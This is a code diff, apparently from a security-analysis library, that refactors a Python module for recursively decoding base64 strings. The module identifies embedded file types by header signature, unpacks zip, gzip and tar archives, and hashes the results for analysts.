-    'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug': 'dll',
-    'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug': 'sys',
-    'UEsDBBQAAAAIA': 'zip',
-    'UEsDBBQAAQAIA': 'zip (passprotected)',
-    'H4sI': 'gz',
-    'N3q8ryccAAR': '7z',
-    'UmFyIRoHAM': 'rar',
-    'JVBERi0xLjcNC': 'pdf',
-    '0M8R4KGxGuE': 'msi',
-    'TVNXSU0AAADQ': 'wim'}
-# pylint: enable=locally-disabled, line-too-long
-_BASE64_HEADER_OFFSET_TYPES = {
-    'DAxMDA3NzcAMDAwMDAwM': 'tar'
+    """TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA\
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug""": "exe",
+    """TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA\
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug""": "dll",
+    """TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA\
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug""": "sys",
+    "UEsDBBQAAAAIA": "zip",
+    "UEsDBBQAAQAIA": "zip (pwd protected)",
+    "H4sI": "gz",
+    "N3q8ryccAAR": "7z",
+    "UmFyIRoHAM": "rar",
+    "JVBERi0xLjcNC": "pdf",
+    "0M8R4KGxGuE": "msi",
+    "TVNXSU0AAADQ": "wim",
 }
+# pylint: enable=locally-disabled, line-too-long
+_BASE64_HEADER_OFFSET_TYPES = {"DAxMDA3NzcAMDAwMDAwM": "tar"}
 
 # Base64 simple regex
-_BASE64_REGEX = '(?P<b64>[A-Za-z0-9+/\\n\\r]{30,}={0,2})'
+_BASE64_REGEX = "(?P<b64>[A-Za-z0-9+/\\n\\r]{30,}={0,2})"
 BASE64_REGEX_C = re.compile(_BASE64_REGEX, re.I | re.X)
-# '''(?<![A-Za-z0-9+\/])
-#             (?:
-#                 (?:[A-Za-z0-9+\/]{4})*
-#                 (?:
-#                     [A-Za-z0-9+\/]{2} [AEIMQUYcgkosw048] = |
-#                     [A-Za-z0-9+\/] [AQgw] ==
-#                 ) |
-#                 (?:[A-Za-z0-9\/]{4})*
-#                 (?:
-#                     \+ [A-Za-z0-9\/+]{3} |
-#                     [A-Za-z0-9\/] \+ [A-Za-z0-9+\/]{2} |
-#                     [A-Za-z0-9\/]{2} \+ [A-Za-z0-9+\/] |
-#                     [A-Za-z0-9\/]{3} \+
-#                 )
-#                 (?:[A-Za-z0-9+\/]{4})*
-#             )
-#             (?![A-Za-z0-9+\/=])'''
+# Same expresion without group for pandas
+_BASE64_REGEX_NG = "[A-Za-z0-9+/\\n\\r]{30,}={0,2}"
+
+# we use this to store a set of strings that match the B64 regex but
+# that we were unable to decode - so that we don't end up in an
+# infinite loop
+_UNDECODABLE_STRINGS: Set[str] = set()
 
 # When True prints see more verbose execution
 # (set from 'trace' parameter to unpack_items)
-# pylint: disable=locally-disabled, C0103
+# pylint: disable=locally-disabled, invalid-name
 _debug_trace = False
-# pylint: enable=locally-disabled, C0103
+# pylint: enable=locally-disabled, invalid-name
+
+_STRIP_TAGS = r"</?decoded[^>]*>"
+
+
+def _get_trace_setting() -> Callable[[Optional[bool]], bool]:
+    """Closure for holding trace setting."""
+    _trace = False
+
+    def _trace_enabled(trace: Optional[bool] = None) -> bool:
+        nonlocal _trace
+        if trace is not None:
+            _trace = trace
+        return _trace
+
+    return _trace_enabled
+
+
+_GET_TRACE = _get_trace_setting()
+
+
+def _get_utf16_setting() -> Callable[[Optional[bool]], bool]:
+    """Closure for holding utf16 decoding setting."""
+    _utf16 = False
+
+    def _utf16_enabled(utf16: Optional[bool] = None) -> bool:
+        nonlocal _utf16
+        if utf16 is not None:
+            _utf16 = utf16
+        return _utf16
+
+    return _utf16_enabled
+
+
+_GET_UTF16 = _get_utf16_setting()
 
 
 @export
-def unpack_items(input_string=None, data=None, column=None, trace=False):
+def unpack_items(
+    input_string: str = None,
+    data: pd.DataFrame = None,
+    column: str = None,
+    trace: bool = False,
+    utf16: bool = False,
+) -> Any:
     """
-    Base64 decode an input string or multiple strings taken from a pandas dataframe column.
-
+    Base64 decode an input string or strings taken from a pandas dataframe.
+
+    Parameters
+    ----------
+    input_string : str, optional
+        single string to decode (the default is None)
+    data : pd.DataFrame, optional
+        dataframe containing column to decode (the default is None)
+    column : str, optional
+        Name of dataframe text column (the default is None)
+    trace : bool, optional
+        Show additional status (the default is None)
+    utf16 : bool, optional
+        Attempt to decode UTF16 byte strings
+
+    Returns
+    -------
+    Tuple[str, pd.DataFrame] (if `input_string`)
+        Decoded string and additional metadata
+    pd.DataFrame
+        Decoded stringa and additional metadata in dataframe
+
+    Notes
+    -----
     If the input is a dataframe you must supply the name of the column to use.
 
     Items that decode to utf-8 or utf-16 strings will be returned as decoded
@@ -111,264 +181,403 @@ def unpack_items(input_string=None, data=None, column=None, trace=False):
     returns:
 
     - decoded string: this is the input string with any decoded sections
-    replaced by the results of the decoding
+      replaced by the results of the decoding
 
     It also returns the data as a Pandas DataFrame with the following columns:
+
     - reference : this is an index that matches an index number in the
-    returned string (e.g. <<encoded binary type=pdf index=1.2').
+      returned string (e.g. <<encoded binary type=pdf index=1.2').
     - original_string : the string prior to decoding - file_type : the type
-    of file if this could be determined
+      of file if this could be determined
     - file_hashes : a dictionary of hashes (the md5, sha1 and sha256 hashes
-    are broken out into separate columns)
+      are broken out into separate columns)
     - input_bytes : the binary image as a byte array
     - decoded_string : printable form of the decoded string (either string
-    or list of hex byte values)
+      or list of hex byte values)
     - encoding_type : utf-8, utf-16 or binary
     - md5, sha1, sha256 : the respective hashes of the binary file_type,
-    file_hashes, input_bytes, md5, sha1, sha256 will be null if this item is
-    decoded to a string
+      file_hashes, input_bytes, md5, sha1, sha256 will be null if this item is
+      decoded to a string
 
     If the input is a dataframe the output dataframe will also include the
     following column: - src_index - the index of the source row in the input
-    frame. This allows you to re-join the output data to the input data
+    frame. This allows you to re-join the output data to the input data.
+
     """
-    global _debug_trace
-    _debug_trace = trace
+    _GET_TRACE(trace)
+    _GET_UTF16(utf16)
 
     if input_string is not None:
+        input_string = _b64_string_pad(input_string)
         return _decode_b64_string_recursive(input_string)
     if data is not None:
         if not column:
-            raise ValueError('column must be supplied if the input is a DataFrame')
-
-        output_df = None
-        for input_row in data[[column]].itertuples():
-            (decoded_string, output_frame) = _decode_b64_string_recursive(input_row[1])
-            output_frame['src_index'] = input_row.Index
-            output_frame['full_decoded_string'] = decoded_string
-            if output_df is None:
-                output_df = output_frame
-            else:
-                if pd_version_23():
-                    output_df = output_df.append(output_frame, ignore_index=True,
-                                                 sort=False)
-                else:
-                    output_df = output_df.append(output_frame, ignore_index=True)
-        return output_df
+            raise ValueError("column must be supplied if the input is a DataFrame")
+        return unpack_df(data=data, column=column, trace=trace, utf16=utf16)
     return None
 
 
-def _debug_print_trace(*args):
-    if _debug_trace:
-        for arg in args:
-            print(arg, end='')
-        print()
+def unpack(
+    input_string: str, trace: bool = False, utf16: bool = False
+) -> Tuple[str, Optional[List[BinaryRecord]]]:
+    """
+    Base64 decode an input string.
+
+    Parameters
+    ----------
+    input_string : str, optional
+        single string to decode (the default is None)
+    trace : bool, optional
+        Show additional status (the default is None)
+    utf16 : bool, optional
+        Attempt to decode UTF16 byte strings
+
+    Returns
+    -------
+    Tuple[str, Optional[List[BinaryRecord]]]
+        Decoded string and additional metadata
+
+    Notes
+    -----
+    Items that decode to utf-8 or utf-16 strings will be returned as decoded
+    strings replaced in the original string. If the encoded string is a
+    known binary type it will identify the file type and return the hashes
+    of the file. If any binary types are known archives (zip, tar, gzip) it
+    will unpack the contents of the archive.
+    For any binary it will return the decoded file as a byte array, and as a
+    printable list of byte values. If the input is a string the function
+    returns:
 
+    - decoded string: this is the input string with any decoded sections
+      replaced by the results of the decoding
 
-# base64 decoding
-def _decode_and_format_b64_string(b64encoded_string, item_prefix=None,
-                                  current_depth=1, current_index=1):
-    """Decode string and return displayable content plus list of decoded artifacts."""
-    # Check if we recognize this as a known file type
-    (_, f_type) = _is_known_b64_prefix(b64encoded_string)
-    _debug_print_trace('Found type: ', f_type)
-    output_files = _decode_b64_binary(b64encoded_string, f_type)
-    if not output_files:
-        return b64encoded_string, None
+    """
+    _GET_TRACE(trace)
+    _GET_UTF16(utf16)
 
-    if len(output_files) == 1:
-        # get the first (only) item
-        out_name, out_record = list(output_files.items())[0]
-        _debug_print_trace('_decode_b64_binary returned a single record')
-        _debug_print_trace('record:', out_record)
-
-        # Build display string
-        # If a string, include the decoded item in the output
-        if out_record.encoding_type in ['utf-8', 'utf-16']:
-            display_string = f'<decoded type=\'string\' name=\'{out_name}\' ' +\
-                             f'index=\'{item_prefix}{current_index}\' ' +\
-                             f'depth=\'{current_depth}\'>' +\
-                             f'{out_record.decoded_string}</decoded>'
-            return display_string, [out_record]
-        else:
-            # if a binary just record its presence
-            display_string = f'<decoded value=\'binary\'  name=\'{out_name}\' ' +\
-                             f'type=\'{out_record.file_type}\' ' +\
-                             f'index=\'{item_prefix}{current_index}\' ' +\
-                             f'depth=\'{current_depth}\'/>'
-            return display_string, [out_record]
-    else:
-        # Build header display string
-        display_header = f'<decoded value=\'multiple binary\' type=\'multiple\' ' +\
-                         f' index=\'{item_prefix}{current_index}\'>'
-        child_display_strings = []
-        child_index = 1
-        child_depth = current_depth + 1
-        _debug_print_trace('_decode_b64_binary returned multiple records')
-
-        # Build child display strings
-        for child_name, child_rec in output_files.items():
-            _debug_print_trace('Child_decode: ', child_rec)
-            child_index_string = f'{item_prefix}{current_index}.{child_index}'
-
-            if child_rec.encoding_type in ['utf-8', 'utf-16']:
-                # If a string, include the decoded item in the output
-                child_display_string = f'<decoded type=\'string\' name=\'{child_name}\' ' +\
-                                       f'index=\'{child_index_string}\' ' +\
-                                       f'depth=\'{child_depth}\'>' +\
-                                       f'{child_rec.decoded_string}</decoded>'
-            else:
-                # if a binary just record its presence
-                child_display_string = f'<decoded type=\'{child_rec.file_type}\' ' +\
-                                       f'name=\'{child_name}\' ' +\
-                                       f'index=\'{child_index_string}\' ' +\
-                                       f'depth=\'{child_depth}\'/>'
-            child_display_strings.append(child_display_string)
-            child_index += 1
-
-        display_string = display_header + ''.join(child_display_strings) + '</decoded>'
-        return display_string, output_files.values()
-
-
-def _decode_b64_string_recursive(input_string, undecodable_strings=None,
-                                 max_recursion=20, current_depth=1, item_prefix=''):
+    return _decode_b64_string_recursive(input_string)
+
+
+def unpack_df(
+    data: pd.DataFrame, column: str, trace: bool = False, utf16: bool = False
+) -> pd.DataFrame:
     """
-    Recursively decode and unpack an encoded string.
+    Base64 decode strings taken from a pandas dataframe.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        dataframe containing column to decode
+    column : str
+        Name of dataframe text column
+    trace : bool, optional
+        Show additional status (the default is None)
+    utf16 : bool, optional
+        Attempt to decode UTF16 byte strings
+
+    Returns
+    -------
+    pd.DataFrame
+        Decoded string and additional metadata in dataframe
+
+    Notes
+    -----
+    Items that decode to utf-8 or utf-16 strings will be returned as decoded
+    strings replaced in the original string. If the encoded string is a
+    known binary type it will identify the file type and return the hashes
+    of the file. If any binary types are known archives (zip, tar, gzip) it
+    will unpack the contents of the archive.
+    For any binary it will return the decoded file as a byte array, and as a
+    printable list of byte values.
+
+    The columns of the output DataFrame are:
+
+    - decoded string: this is the input string with any decoded sections
+      replaced by the results of the decoding
+    - reference : this is an index that matches an index number in the
+      decoded string (e.g. <<encoded binary type=pdf index=1.2').
+    - original_string : the string prior to decoding
+    - file_type : the type of file if this could be determined
+    - file_hashes : a dictionary of hashes (the md5, sha1 and sha256 hashes
+      are broken out into separate columns)
+    - input_bytes : the binary image as a byte array
+    - decoded_string : printable form of the decoded string (either string
+      or list of hex byte values)
+    - encoding_type : utf-8, utf-16 or binary
+    - md5, sha1, sha256 : the respective hashes of the binary file_type,
+      file_hashes, input_bytes, md5, sha1, sha256 will be null if this item is
+      decoded to a string
+    - src_index - the index of the source row in the input
+      frame.
 
-        :rtype: (str, [BinaryRecord]
     """
-    _debug_print_trace('_decode_b64_string_recursive: ', max_recursion)
-    _debug_print_trace('processing input: ', input_string[:200])
+    _GET_TRACE(trace)
+    _GET_UTF16(utf16)
+
+    output_df = pd.DataFrame(columns=BinaryRecord._fields)
+    row_results: List[pd.DataFrame] = []
+    rows_with_b64_match = data[data[column].str.contains(_BASE64_REGEX_NG)]
+    for input_row in rows_with_b64_match[[column]].itertuples():
+        (decoded_string, output_frame) = _decode_b64_string_recursive(input_row[1])
+        output_frame["src_index"] = input_row.Index
+        output_frame[column] = input_row._asdict()[column]
+        output_frame["full_decoded_string"] = decoded_string
+        row_results.append(output_frame)
+
+    if row_results:
+        output_df = pd.concat(row_results, ignore_index=True)
+    return output_df
+
+
+# pylint: disable=too-many-locals
+def _decode_b64_string_recursive(
+    input_string: str,
+    max_recursion: int = 20,
+    current_depth: int = 1,
+    item_prefix: str = "",
+) -> Tuple[str, pd.DataFrame]:
+    """Recursively decode and unpack an encoded string."""
+    _debug_print_trace("_decode_b64_string_recursive: ", max_recursion)
+    _debug_print_trace("processing input: ", input_string[:200])
 
     decoded_string = input_string
 
-    # we use this to store a set of strings that match the B64 regex but
-    # that we were unable to decode - so that we don't end up in an
-    # infinite loop
-    if not undecodable_strings:
-        undecodable_strings = set()
-
-    binary_records = pd.DataFrame(columns=_RESULT_FIELDS)
+    df_results = pd.DataFrame(columns=BinaryRecord._fields)
     fragment_index = 0
     match_pos = 0
-    something_decoded = False
+    decode_success = False
+
     while True:
-        # search sequentially through the input string for any strings that look like base64
-        _debug_print_trace('regex searching ', decoded_string[:200],
-                           ' from pos: ', match_pos, ' bin_index ',
-                           fragment_index)
+        # search sequentially through the input string for any strings
+        # that look like base64
+        _debug_print_trace(
+            f"regex searching {decoded_string[:200]} ",
+            f"from pos: {match_pos} bin_index {fragment_index}",
+        )
         b64match = BASE64_REGEX_C.search(decoded_string, match_pos)
+        if b64match is None:
+            break
 
-        # _debug_print_trace('groups: ', len(b64match.groupdict()))
-        if b64match is not None:
-            _debug_print_trace('regex found: ', b64match.groupdict()['b64'])
-            # if (in a recursive call) we already know that this string doesn't decode
-            # skip this match
-            if b64match.groupdict()['b64'] in undecodable_strings:
-                _debug_print_trace('previous undecodable string')
-                match_pos = b64match.end()
-                continue
-
-            # try to decode
-            fragment_index += 1
-            (decoded_fragment, binary_items) = (
-                _decode_and_format_b64_string(b64match.groupdict()['b64'],
-                                              item_prefix=item_prefix,
-                                              current_index=fragment_index,
-                                              current_depth=current_depth))
-
+        b64_candidate = b64match.groupdict()["b64"]
+        _debug_print_trace("regex found: ", b64_candidate)
+        # if we already know that this string won't decode, skip
+        if b64_candidate in _UNDECODABLE_STRINGS:
+            match_pos = b64match.end()
+            continue
+
+        # try to decode
+        fragment_index += 1
+        (decoded_fragment, binary_items) = _decode_and_format_b64_string(
+            b64_candidate,
+            item_prefix=item_prefix,
+            current_index=fragment_index,
+            current_depth=current_depth,
+        )
+
+        decode_success = decoded_fragment != b64_candidate
+        if decode_success:
+            # we did decode something so lets put our result this in the output string
+            if binary_items:
+                new_records = _add_to_results(
+                    binary_items,
+                    b64_candidate,
+                    current_depth,
+                    item_prefix,
+                    fragment_index,
+                )
+                df_results = df_results.append(
+                    new_records, ignore_index=True, sort=False
+                )
+            # replace the decoded fragment in our current results string
+            # (decode_string)
+            decoded_string = decoded_string.replace(b64_candidate, decoded_fragment)
+            _debug_print_trace(
+                "Replaced string",
+                decoded_string[match_pos : match_pos + 100],  # noqa: E203
+            )
+            match_pos += len(decoded_fragment)
+        else:
             # if the string didn't decode we'll have the same output as input
             # so add that to our set of undecodable strings (we need to track this
             # otherwise we will recurse infinitely)
-            something_decoded = (decoded_fragment != b64match.groupdict()['b64'])
-            if something_decoded:
-                # we did decode something so lets put our result this in the output string
-                if binary_items:
-                    # if there are one or more binary_items from decoding
-                    # add them to our output DataFrame
-                    for bin_record in binary_items:
-                        new_row = bin_record._asdict()
-                        new_row['reference'] = f'{item_prefix}{current_depth}.{fragment_index}'
-                        new_row['original_string'] = b64match.groupdict()['b64']
-                        new_row['md5'] = new_row['file_hashes']['md5']
-                        new_row['sha1'] = new_row['file_hashes']['sha1']
-                        new_row['sha256'] = new_row['file_hashes']['sha256']
-
-                        if pd_version_23():
-                            binary_records = binary_records.append(new_row,
-                                                                   ignore_index=True,
-                                                                   sort=False)
-                        else:
-                            binary_records = binary_records.append(new_row,
-                                                                   ignore_index=True)
-
-                # replace the decoded fragment in our current results string (decode_string)
-                decoded_string = decoded_string.replace(b64match.groupdict()['b64'],
-                                                        decoded_fragment)
-                _debug_print_trace('Replaced string', decoded_string[match_pos:match_pos + 100])
-                match_pos += len(decoded_fragment)
-            else:
-                undecodable_strings.add(b64match.groupdict()['b64'])
-                _debug_print_trace('new undecodable string')
-                match_pos = b64match.end()
-
-        else:
-            _debug_print_trace('Regex not found: ', match_pos)
-            break
+            _UNDECODABLE_STRINGS.add(b64_candidate)
+            _debug_print_trace("new undecodable string")
+            match_pos = b64match.end()
 
         if fragment_index > 50:
             break
 
     # if we reach our max recursion depth bail out here
     if max_recursion == 0:
-        _debug_print_trace('max recursion reached')
-        return decoded_string, binary_records
-
-    if something_decoded:
-        # stuff that we have already decoded may also contain further base64 encoded strings
-        pfx = f'{item_prefix}.{fragment_index}.' if item_prefix else f'{fragment_index}.'
-        (next_level_string, child_records) = _decode_b64_string_recursive(
-            decoded_string, undecodable_strings, item_prefix=pfx,
-            max_recursion=max_recursion - 1, current_depth=(current_depth + 1))
-        return next_level_string, binary_records.append(
-            child_records, ignore_index=True, sort=False)
-    else:
-        _debug_print_trace('Nothing left to decode')
-        return decoded_string, binary_records
+        _debug_print_trace("max recursion reached")
+        return decoded_string, df_results
+
+    if decode_success:
+        # stuff that we have already decoded may also contain further
+        # base64 encoded strings
+        prefix = (
+            f"{item_prefix}.{fragment_index}." if item_prefix else f"{fragment_index}."
+        )
+        next_level_string, child_records = _decode_b64_string_recursive(
+            decoded_string,
+            item_prefix=prefix,
+            max_recursion=max_recursion - 1,
+            current_depth=(current_depth + 1),
+        )
+        return (
+            next_level_string,
+            df_results.append(child_records, ignore_index=True, sort=False),
+        )
+
+    _debug_print_trace("Nothing left to decode")
+    return decoded_string, df_results
+
+
+def _add_to_results(
+    binary_items: Iterable[BinaryRecord],
+    original_str: str,
+    current_depth: int,
+    item_prefix: str,
+    fragment_index: int,
+) -> List[Dict[str, Any]]:
+    """Add current set of decoding results to collection."""
+    new_rows = []
+    for bin_record in binary_items:
+        new_row = bin_record._asdict()
+        new_row["reference"] = (
+            f"{item_prefix}",
+            f"{current_depth}.",
+            f"{fragment_index}",
+        )
+        new_row["original_string"] = original_str
+        new_row["md5"] = new_row["file_hashes"]["md5"]
+        new_row["sha1"] = new_row["file_hashes"]["sha1"]
+        new_row["sha256"] = new_row["file_hashes"]["sha256"]
+
+        new_rows.append(new_row)
+    return new_rows
+
+
+def _debug_print_trace(*args):
+    if _GET_TRACE():
+        for arg in args:
+            print(arg, end="")
+        print()
+
 
+# pylint: disable=too-many-locals
+def _decode_and_format_b64_string(
+    b64encoded_string: str,
+    item_prefix: str = "",
+    current_depth: int = 1,
+    current_index: int = 1,
+) -> Tuple[str, Optional[List[BinaryRecord]]]:
+    """Decode string and return displayable content plus list of decoded artifacts."""
+    # Check if we recognize this as a known file type
+    (_, f_type) = _is_known_b64_prefix(b64encoded_string)
+    _debug_print_trace("Found type: ", f_type)
+    output_files = _decode_b64_binary(b64encoded_string, f_type)
+    if not output_files:
+        return b64encoded_string, None
 
-def _print_bytes(bytes_array):
+    if len(output_files) == 1:
+        # get the first (only) item
+        out_name, out_record = output_files.popitem()
+        _debug_print_trace("_decode_b64_binary returned a single record")
+        _debug_print_trace("record:", out_record)
+
+        disp_string = _format_single_record(
+            out_name, out_record, item_prefix, current_depth, str(current_index)
+        )
+        return disp_string, [out_record]
+
+    # Build header display string
+    display_header = (
+        f"<decoded value='multiple binary' type='multiple' "
+        f"index='{item_prefix}{current_index}' "
+        f"depth='{current_depth}'>"
+    )
+    child_display_strings = []
+    child_depth = current_depth + 1
+    _debug_print_trace("_decode_b64_binary returned multiple records")
+
+    # Build child display strings
+    for child_index, (child_name, child_rec) in enumerate(
+        output_files.items(), start=1
+    ):
+        _debug_print_trace("Child_decode: ", child_rec)
+        child_index_string = f"{item_prefix}{current_index}.{child_index}"
+        disp_string = _format_single_record(
+            child_name, child_rec, item_prefix, child_depth, child_index_string
+        )
+        child_display_strings.append(disp_string)
+    display_string = display_header + "".join(child_display_strings) + "</decoded>"
+    return display_string, list(output_files.values())
+
+
+def _format_single_record(
+    out_name: str,
+    out_record: BinaryRecord,
+    item_prefix: str,
+    current_depth: int,
+    current_index: str,
+) -> str:
+    # Build display string
+    # If a string, include the decoded item in the output
+    if out_record.encoding_type in ["utf-8", "utf-16"]:
+        display_string = (
+            f"<decoded type='string' name='{out_name}' "
+            f"index='{item_prefix}{current_index}' "
+            f"depth='{current_depth}'>"
+            f"{out_record.decoded_string}</decoded>"
+        )
+        return display_string
+
+    # if a binary include printable bytes
+    display_string = (
+        f"<decoded value='binary'  name='{out_name}' "
+        f"type='{out_record.file_type}' "
+        f"index='{item_prefix}{current_index}' "
+        f"depth='{current_depth}'>"
+        f"{out_record.printable_bytes}</decoded>"
+    )
+    return display_string
+
+
+def _print_bytes(bytes_array: bytes):
     """Print byte array as string or hex."""
     enc_results = _get_byte_encoding(bytes_array)
-    if enc_results.encoding_type != 'binary':
+    if enc_results.encoding_type != "binary":
         print(enc_results.decoded_string)
 
     else:
-        print('Could not decode bytes to string. Hashes:')
-        print(get_hashes(_binary_to_bytesio(bytes_array).getbuffer()))
+        print("Could not decode bytes to string. Hashes:")
+        print(get_hashes(_binary_to_bytesio(bytes_array)))
         print(enc_results.printable_bytes)
 
 
-def _as_byte_string(bytes_array):
-    return ' '.join(['{0:02x}'.format(b) for b in bytes_array])
+def _as_byte_string(bytes_array) -> str:
+    return " ".join(f"{b:02x}" for b in bytes_array)
 
 
-def _empty_binary_rec():
-    return BinaryRecord(reference=None,
-                        original_string=None,
-                        decoded_string=None,
-                        encoding_type=None,
-                        file_name=None,
-                        file_type=None,
-                        input_bytes=None,
-                        file_hashes=None,
-                        md5=None,
-                        sha1=None,
-                        sha256=None,
-                        printable_bytes=None)
+def _empty_binary_rec() -> BinaryRecord:
+    return BinaryRecord(
+        reference=None,
+        original_string=None,
+        decoded_string=None,
+        encoding_type=None,
+        file_name=None,
+        file_type=None,
+        input_bytes=None,
+        file_hashes=None,
+        md5=None,
+        sha1=None,
+        sha256=None,
+        printable_bytes=None,
+    )
 
 
-def _get_byte_encoding(bytes_array):
+def _get_byte_encoding(bytes_array: bytes) -> BinaryRecord:
     """
     Return encoding type and decoded result.
 
@@ -377,30 +586,37 @@ def _get_byte_encoding(bytes_array):
     """
     result_rec = _empty_binary_rec()
     printable_bytes = _as_byte_string(bytes_array)
+    if _GET_UTF16():  # type: ignore
+        try:
+            # Difficult to tell the difference between a real unicode string
+            # and a binary string that happens to decode to a utf-16 string.
+            # So we don't do this unless instructed to
+            decoded_string = bytes_array.decode("utf-16")
+            return result_rec._replace(
+                decoded_string=decoded_string,
+                encoding_type="utf-16",
+                printable_bytes=printable_bytes,
+            )
+        except UnicodeDecodeError:
+            pass
     try:
-        decoded_string = bytes_array.decode('utf-8')
-        return result_rec._replace(decoded_string=decoded_string,
-                                   encoding_type='utf-8',
-                                   printable_bytes=printable_bytes)
+        decoded_string = bytes_array.decode("utf-8")
+        return result_rec._replace(
+            decoded_string=decoded_string,
+            encoding_type="utf-8",
+            printable_bytes=printable_bytes,
+        )
     except UnicodeDecodeError:
         pass
 
-    try:
-        # Difficult to tell the difference between a real unicode string
-        # and a binary string that happens to decode to a utf-16 string
-        decoded_string = bytes_array.decode('utf-16')
-        return result_rec._replace(decoded_string=decoded_string,
-                                   encoding_type='utf-16',
-                                   printable_bytes=printable_bytes)
-    except UnicodeDecodeError:
-        pass
-    return result_rec._replace(encoding_type='binary',
-                               printable_bytes=printable_bytes)
+    return result_rec._replace(encoding_type="binary", printable_bytes=printable_bytes)
 
 
-def _is_known_b64_prefix(input_string):
+def _is_known_b64_prefix(
+    input_string: str,
+) -> Union[Tuple[str, str], Tuple[None, None]]:
     """If this is known file type return the prefix and file type."""
-    first160chars = input_string[0:160].replace('\n', '').replace('\r', '')
+    first160chars = input_string[0:160].replace("\n", "").replace("\r", "")
     for prefix, file_type in _BASE64_HEADER_TYPES.items():
         if first160chars.startswith(prefix):
             return prefix, file_type
@@ -412,7 +628,9 @@ def _is_known_b64_prefix(input_string):
     return None, None
 
 
-def _decode_b64_binary(input_string, file_type=None):
+def _decode_b64_binary(
+    input_string: str, file_type: str = None
+) -> Optional[Dict[str, BinaryRecord]]:
     """Examine input string for known binaries and decode and unpack."""
     if not file_type:
         (_, f_type) = _is_known_b64_prefix(input_string)
@@ -423,12 +641,14 @@ def _decode_b64_binary(input_string, file_type=None):
         return _unpack_and_hash_b64_binary(decoded_bytes, file_type)
     except binascii.Error:
         # we couldn't decode
-        _debug_print_trace('Binascii exception - trying to decode string')
+        _debug_print_trace("Binascii exception - trying to decode string")
         _debug_print_trace(input_string)
         return None
 
 
-def _unpack_and_hash_b64_binary(input_bytes, file_type=None):
+def _unpack_and_hash_b64_binary(
+    input_bytes: bytes, file_type: str = None
+) -> Optional[Dict[str, BinaryRecord]]:
     """
     If this is a known archive type extract the contents.
 
@@ -438,40 +658,47 @@ def _unpack_and_hash_b64_binary(input_bytes, file_type=None):
     if not input_bytes:
         return None
 
-    output_files = dict()
-    if file_type in ['zip', 'gz', 'tar']:
+    output_files = {}
+    if file_type in ["zip", "gz", "tar"]:
         # if this is a known archive type - try to extract the contents
         (unpacked_type, file_items) = _get_items_from_archive(input_bytes, file_type)
-        if unpacked_type != 'unknown':
+        if unpacked_type != "unknown":
             for file_name, extracted_file in file_items.items():
                 file_results = _get_hashes_and_printable_string(extracted_file)
-                idx = f'[{unpacked_type}] Filename: {file_name}'
-
-                # ToDo - the unpacked type here refers to the archive file type so assigning this
-                # to file_type is not exactly the right thing to do. In a future episode we'll
-                # try to determine the file type using magic numbers.
-                output_files[idx] = file_results._replace(file_name=file_name,
-                                                          file_type=unpacked_type,
-                                                          input_bytes=extracted_file)
-                _debug_print_trace('_unpack_and_hash_b64_binary item (archive): ',
-                                   type(file_results.decoded_string),
-                                   file_results.decoded_string)
+                idx = f"[{unpacked_type}] Filename: {file_name}"
+
+                # ToDo - the unpacked type here refers to the archive file type  # pylint: disable=fixme
+                # so assigning this to file_type is not exactly the right thing
+                # to do. In a future episode we'll try to determine the file type
+                # using magic numbers.
+                output_files[idx] = file_results._replace(
+                    file_name=file_name,
+                    file_type=unpacked_type,
+                    input_bytes=extracted_file,
+                )
+                _debug_print_trace(
+                    "_unpack_and_hash_b64_binary item (archive): ",
+                    type(file_results.decoded_string),
+                    file_results.decoded_string,
+                )
 
     if not output_files:
         # if this wasn't a known archive type or we failed to unpack anything,
         # just get the hashes and return
         file_results = _get_hashes_and_printable_string(input_bytes)
-        idx = f'[{file_type}]'
-        output_files[idx] = file_results._replace(file_name='unknown',
-                                                  file_type=file_type,
-                                                  input_bytes=input_bytes)
-        _debug_print_trace('_unpack_and_hash_b64_binary item (other): ',
-                           type(file_results.decoded_string),
-                           file_results.decoded_string)
+        idx = f"[{file_type}]"
+        output_files[idx] = file_results._replace(
+            file_name="unknown", file_type=file_type, input_bytes=input_bytes
+        )
+        _debug_print_trace(
+            "_unpack_and_hash_b64_binary item (other): ",
+            type(file_results.decoded_string),
+            file_results.decoded_string,
+        )
     return output_files
 
 
-def _get_hashes_and_printable_string(extracted_file):
+def _get_hashes_and_printable_string(extracted_file: bytes) -> BinaryRecord:
     """
     Get the hashes, encoding type and printable form of binary.
 
@@ -482,70 +709,195 @@ def _get_hashes_and_printable_string(extracted_file):
     return file_details._replace(file_hashes=file_hashes)
 
 
-def _get_items_from_archive(binary, archive_type='zip'):
+def _get_items_from_archive(
+    binary: bytes, archive_type: str = "zip"
+) -> Tuple[str, Dict[str, bytes]]:
     """Extract contained files from an archive type."""
-    _debug_print_trace('_get_items_from_archive type: ', archive_type)
-    if archive_type == 'zip':
+    _debug_print_trace("_get_items_from_archive type: ", archive_type)
+    if archive_type == "zip":
         return get_items_from_zip(binary)
-    elif archive_type == 'gz':
+    if archive_type == "gz":
         return get_items_from_gzip(binary)
-    elif archive_type == 'tar':
+    if archive_type == "tar":
         return get_items_from_tar(binary)
-    else:
-        return 'unknown', {archive_type, binary}
+    return "unknown", {archive_type: binary}
 
 
 @export
-def get_items_from_gzip(binary):
-    """Return decompressed gzip contents."""
+def get_items_from_gzip(binary: bytes) -> Tuple[str, Dict[str, bytes]]:
+    """
+    Return decompressed gzip contents.
+
+    Parameters
+    ----------
+    binary : bytes
+        byte array of gz file
+
+    Returns
+    -------
+    Tuple[str, bytes]
+        File type + decompressed file
+
+    """
     archive_file = gzip.decompress(binary)
-    return 'gz', {'gzip_file': archive_file}
+    return "gz", {"gzip_file": archive_file}
 
 
 @export
-def get_items_from_zip(binary):
-    """Return dictionary of zip contents."""
+def get_items_from_zip(binary: bytes) -> Tuple[str, Dict[str, bytes]]:
+    """
+    Return dictionary of zip contents.
